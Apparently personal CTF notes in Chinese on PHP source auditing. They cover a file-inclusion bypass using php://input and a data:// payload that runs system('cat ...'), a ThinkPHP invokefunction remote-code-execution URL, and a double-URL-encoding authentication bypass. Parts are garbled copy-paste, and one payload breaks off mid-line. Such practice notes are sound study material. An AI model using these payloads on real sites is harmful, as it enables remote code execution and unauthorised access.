ctf 记录

源码审计

文件包含： 

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

1. php://input   + post  数据 php 代码。 

2. ?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?> 

thinkphp rce 漏洞在利用的时候注意payload 

漏洞利用：
payload：
查看phpinfo：

http://your-ip:8080/index.php？s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
1
查看敏感文件：

http://your-ip:8080/index.php？s=/Index/\think\app/invokefunction&function=call_user_func_
 

<?php
if("admin"===$_GET[id]) {			
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

第一步，要使得"admin"===$_GET[id]不成立
我们可以对admin进行url编码，当然也可以对其中一个字母编码我们这里对a进行编码：%61dmin

第一次实际比较if("admin"==="%61dmin")   不成立
1
第二步，经过G E T [ i d ] = u r l d e c o d e ( _GET[id] = urldecode( 
G
​
 ET[id]=urldecode(_GET[id]);，使得$_GET[id] == "admin"成立。
经过urldecode解码后变成admin

第二次实际比较if("admin" == "admin");    成立
1
**注意：**当传入参数id时，浏览器在后面会对非ASCII码的字符进行一次urlencode编码，运行时会自动进行一次urldecode

因为我们在url连接里直接运行，浏览器会进行一次url解码，所以我们还要进行一次url编码，就是对admin进行两次编码再运行

urldecode(%2561)=%61  
urldecode(%61)=a